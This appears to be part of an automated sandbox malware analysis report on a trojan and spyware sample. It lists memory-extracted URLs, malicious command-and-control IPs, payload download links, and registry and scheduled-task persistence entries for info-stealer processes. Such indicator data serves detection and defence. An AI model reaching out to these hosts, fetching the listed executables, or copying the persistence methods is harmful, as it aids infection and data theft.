http://ddl.safone.dev/3846636/Set-up.exe?hash=AgADDB	axplong.exe, 00000007.00000002.2766434406.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	false
https://locatedblsoqp.shop/apiO3	BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	true
https://nel.heroku.com/reports?ts=1725376397&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=VilhT43dcQ97	axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id2Response	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://www.x-ways.net/winhex/subscribe-d.htmlU	1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	false
http://tempuri.org/Entity/Id21Response	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://91.202.233.158/e96ea2db21fa9a1b.phpdllt	svchost015.exe, 00000019.00000002.2536441815.0000000027160000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp	false
http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZlqos.dll	axplong.exe, 00000007.00000002.2766434406.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
https://api.ip.sb/ip	build.exe, 0000001C.00000002.2400677209.000000000321E000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 00000028.00000002.2703663881.00000000041C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2745709445.0000000000420000.00000040.00000400.00020000.00000000.sdmp	false
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id24Response	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	stealc_default2.exe, 00000016.00000003.2145545317.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2323102184.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2451282884.0000000002E94000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.php3b	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	false
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000025.00000002.2579761363.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2699501604.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2687524545.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp	false
http://ddl.safone.dev/3846636/Set-up.exe?hash=AgADDBu%	axplong.exe, 00000007.00000002.2766434406.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
https://locatedblsoqp.shop:443/api	BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	true
http://185.215.113.17/2fb6c2cc8dce150a.php3	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.php7	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.php/	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpE	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10ResponseD	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id5Response	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15ResponseD	RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10Response	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phph	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpS	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id8Response	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.php/d	axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpK	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029F8000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpy	Hkbsse.exe, 00000015.00000002.2749654758.0000000001148000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpf	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	false
http://ddl.safone.dev/3840509/build.exe?hash=AgADNBS	axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.php_	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpJ	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.php?scr=19?;	AppLaunch.exe, 0000001F.00000002.2776323138.0000000008220000.00000004.00000020.00020000.00000000.sdmp	false
http://fivexv5vs.top/v1/upload.php	Set-up.exe, 00000017.00000002.2762123605.0000000001352000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000017.00000002.2762123605.000000000132E000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpw	stealc_default2.exe, 00000016.00000002.2264539028.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpR	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
https://locatedblsoqp.shop/;-	BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	true
http://185.215.113.19/CoreOPT/index.php?scr=19	AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000001F.00000002.2776323138.0000000008220000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpY	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://fivexv5pn.top/v1/upload.phpDCPE	Setup.exe, 0000001A.00000003.2692200875.0000000001357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000002.2776704139.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id13Response	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpb	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
https://transfer.adminforge.de/5	AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpe	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.php2	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.php1	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id4ResponseD	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.php4	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://thirtv13vt.top/v1/upload.phpsa	channel3.exe, 00000027.00000002.2765546909.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id22ResponseD	RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id16ResponseD	RegAsm.exe, 0000000B.00000002.2110237826.0000000003497000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.php?	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpB	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpG	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id19ResponseD	RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpD	Hkbsse.exe, 00000015.00000002.2749654758.0000000001186000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.202.233.158	unknown	Russian Federation	9009	M247GB	true
185.215.113.26	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
103.130.147.211	unknown	Turkey	63859	MYREPUBLIC-AS-IDPTEkaMasRepublikID	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
95.179.250.45	unknown	Netherlands	20473	AS-CHOOPAUS	true
195.133.13.230	thirtv13vt.top	Russian Federation	197695	AS-REGRU	true
176.9.8.206	transfer.adminforge.de	Germany	24940	HETZNER-ASDE	false
188.114.97.3	millyscroqwp.shop	European Union	13335	CLOUDFLARENETUS	true
52.212.52.84	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com	United States	16509	AMAZON-02US	false
65.21.18.51	unknown	United States	199592	CP-ASDE	true
188.114.96.3	locatedblsoqp.shop	European Union	13335	CLOUDFLARENETUS	true
195.133.48.136	fivexv5pn.top	Russian Federation	48347	MTW-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1503584
Start date and time:	2024-09-03 17:11:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@65/87@16/14
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 79% Number of executed functions: 360 Number of non-executed functions: 107
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 4936 because there are no executed function
Execution Graph export aborted for target file.exe, PID 3396 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:13:00	API Interceptor	86752x Sleep call for process: axplong.exe modified
11:13:13	API Interceptor	70x Sleep call for process: RegAsm.exe modified
11:13:13	API Interceptor	665x Sleep call for process: Hkbsse.exe modified
11:13:20	API Interceptor	33x Sleep call for process: rHCHrI9F0v.exe modified
11:13:34	API Interceptor	7x Sleep call for process: svchost015.exe modified
11:13:48	API Interceptor	3x Sleep call for process: Setup.exe modified
11:13:52	API Interceptor	5x Sleep call for process: runtime.exe modified
11:13:53	API Interceptor	218x Sleep call for process: AppLaunch.exe modified
11:14:03	API Interceptor	2x Sleep call for process: BitLockerToGo.exe modified
11:14:10	API Interceptor	7x Sleep call for process: Set-up.exe modified
11:14:15	API Interceptor	2x Sleep call for process: channel3.exe modified
17:12:15	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
17:13:13	Task Scheduler	Run new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
17:13:49	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Amadeus.exe C:\Users\user\1000238002\Amadeus.exe
17:13:54	Task Scheduler	Run new task: runtime path: C:\Users\user\Pictures\Lighter s>Tech\runtime.exe
17:13:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce runtime C:\Users\user\Pictures\Lighter Tech\runtime.exe
17:14:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Amadeus.exe C:\Users\user\1000238002\Amadeus.exe
17:14:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce runtime C:\Users\user\Pictures\Lighter Tech\runtime.exe

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
